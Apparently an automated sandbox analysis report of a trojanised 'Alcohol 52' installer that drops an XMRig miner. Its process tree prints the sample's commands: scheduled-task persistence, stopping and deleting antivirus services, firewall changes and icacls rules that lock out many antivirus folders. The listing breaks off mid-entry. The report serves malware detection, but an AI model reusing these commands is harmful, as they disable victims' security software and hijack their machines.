Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    01-06-2024 03:28

General

  • Target

    Alcohol_120_v2.0.3/Alcohol.52.Free.Edition.v2.0.3.6951.exe

  • Size

    871KB

  • MD5

    a801066da12e786c0277e70c191bc936

  • SHA1

    2920b27e50c079f99502d2f574655e20657bdebd

  • SHA256

    599297d2596c79c0f43b555a88a77f7f89943397298a60cf7fc991b6d0e696c3

  • SHA512

    31292e5ebebb03de4018b04a28324c65e36656472cdc98328ad4f77544a762f5f0c397b6f12c886272fc08f4d9fa7579560e0cf33f02e19af4fd7e7731d619d8

  • SSDEEP

    12288:GCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBgasLvhpFQ:GCdxte/80jYLT3U1jfsWasDbFQ

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
  • Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 6 IoCs
  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 1 IoCs

    Uses a command-line utility to view network configuration.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe
    "C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
      C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\ProgramData\Setup\update.exe
        "C:\ProgramData\Setup\update.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Blocks application from running via registry modification
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies WinLogon
        • Drops file in Program Files directory
        • Modifies system certificate store
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2232
        • C:\ProgramData\Setup\taskhost.exe
          C:\ProgramData\Setup\taskhost.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2664
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\programdata\microsoft\temp\H.bat
            5⤵
            • Drops file in Drivers directory
            PID:2712
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:2472
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:2816
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:1668
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2668
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2808
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:3004
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:476
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:540
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            5⤵
            • Launches sc.exe
            PID:580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1540
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            5⤵
            • Launches sc.exe
            PID:1636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1848
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            5⤵
            • Launches sc.exe
            PID:1988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            5⤵
            • Launches sc.exe
            PID:2320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          4⤵
          PID:1652
          • C:\Windows\SysWOW64\sc.exe
            sc delete swprv
            5⤵
            • Launches sc.exe
            PID:868
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop mbamservice
          4⤵
          PID:1808
          • C:\Windows\SysWOW64\sc.exe
            sc stop mbamservice
            5⤵
            • Launches sc.exe
            PID:2012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
          4⤵
          PID:1604
          • C:\Windows\SysWOW64\sc.exe
            sc stop bytefenceservice
            5⤵
            • Launches sc.exe
            PID:1940
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
          4⤵
          PID:1944
          • C:\Windows\SysWOW64\sc.exe
            sc delete bytefenceservice
            5⤵
            • Launches sc.exe
            PID:2304
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete mbamservice
          4⤵
          PID:1036
          • C:\Windows\SysWOW64\sc.exe
            sc delete mbamservice
            5⤵
            • Launches sc.exe
            PID:2208
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete crmsvc
          4⤵
          PID:1744
          • C:\Windows\SysWOW64\sc.exe
            sc delete crmsvc
            5⤵
            • Launches sc.exe
            PID:2636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
          4⤵
          PID:800
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state on
            5⤵
            • Modifies Windows Firewall
            PID:1784
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
          4⤵
          PID:1312
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:2464
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
          4⤵
          PID:2484
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:1908
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
          4⤵
          PID:2164
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:2748
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
          4⤵
          PID:2756
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
            5⤵
            • Modifies Windows Firewall
            PID:3012
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2432
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
          4⤵
          PID:2976
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:820
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1352
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
          4⤵
          PID:1468
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1608
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:1764
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1760
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
          4⤵
          PID:1972
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1956
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:1960
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1016
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
          4⤵
          PID:676
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2792
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:872
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1588
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          4⤵
          PID:1568
          • C:\Windows\SysWOW64\icacls.exe
            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1584
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
          4⤵
          PID:1732
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1696
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          4⤵
          PID:2084
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2080
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
          4⤵
          PID:2072
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny Admin:(F)
            5⤵
            • Modifies file permissions
            PID:1720
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
          4⤵
          PID:2952
          • C:\Windows\SysWOW64\icacls.exe
            icacls c:\programdata\Malwarebytes /deny System:(F)
            5⤵
            • Modifies file permissions
            PID:1452
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
          4⤵
          PID:1032
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny Admin:(F)
            5⤵
            • Modifies file permissions
            PID:2476
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
          4⤵
          PID:2200
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\MB3Install /deny System:(F)
            5⤵
            • Modifies file permissions
            PID:2660
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2052
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2884
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
          4⤵
          PID:2640
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2412
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2456
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:2820
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2436
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:372
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
          4⤵
          PID:3004
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1640
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
          4⤵
          PID:324
          • C:\Windows\SysWOW64\icacls.exe
            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:552
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2004
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1668
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:276
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1616
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:1120
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1820
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:2312
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
            PID:1328
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
          4⤵
          PID:560
          • C:\Windows\SysWOW64\icacls.exe
            icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
            5⤵
            • Modifies file permissions
                                                                                        PID:284
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                      4⤵
                                                                                        PID:2328
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                          5⤵
                                                                                          • Modifies file permissions
                                                                                          PID:1996
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                        4⤵
                                                                                          PID:2152
                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                            icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                            5⤵
                                                                                            • Modifies file permissions
                                                                                            PID:1600
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                          4⤵
                                                                                            PID:968
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                              5⤵
                                                                                              • Modifies file permissions
                                                                                              PID:1040
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                            4⤵
                                                                                              PID:532
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                5⤵
                                                                                                • Modifies file permissions
                                                                                                PID:2332
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                              4⤵
                                                                                                PID:928
                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                  icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                  5⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:2440
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                4⤵
                                                                                                  PID:2396
                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                    5⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:796
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                  4⤵
                                                                                                    PID:1740
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                      5⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:1920
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                    4⤵
                                                                                                      PID:684
                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                        5⤵
                                                                                                        • Modifies file permissions
                                                                                                        PID:2128
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                      4⤵
                                                                                                        PID:2096
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                          5⤵
                                                                                                          • Modifies file permissions
                                                                                                          PID:2432
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                        4⤵
                                                                                                          PID:2176
                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                            5⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:820
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                          4⤵
                                                                                                            PID:992
                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                              icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                              5⤵
                                                                                                              • Modifies file permissions
                                                                                                              PID:2368
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                            4⤵
                                                                                                              PID:1768
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                5⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:1664
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                              4⤵
                                                                                                                PID:2876
                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                  5⤵
                                                                                                                  • Modifies file permissions
                                                                                                                  PID:2960
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                4⤵
                                                                                                                  PID:2900
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                    5⤵
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:2836
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                  4⤵
                                                                                                                    PID:1008
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                      5⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:2800
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                    4⤵
                                                                                                                      PID:2832
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                        5⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:2068
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                        PID:2696
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                          5⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:2572
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
                                                                                                                        4⤵
                                                                                                                          PID:2064
                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                            icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
                                                                                                                            5⤵
                                                                                                                            • Modifies file permissions
                                                                                                                            PID:1904
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                          4⤵
                                                                                                                            PID:1672
                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                              icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                              5⤵
                                                                                                                              • Modifies file permissions
                                                                                                                              PID:2760
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
                                                                                                                            4⤵
                                                                                                                              PID:1288
                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
                                                                                                                                5⤵
                                                                                                                                • Modifies file permissions
                                                                                                                                PID:2768
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
                                                                                                                              4⤵
                                                                                                                                PID:1620
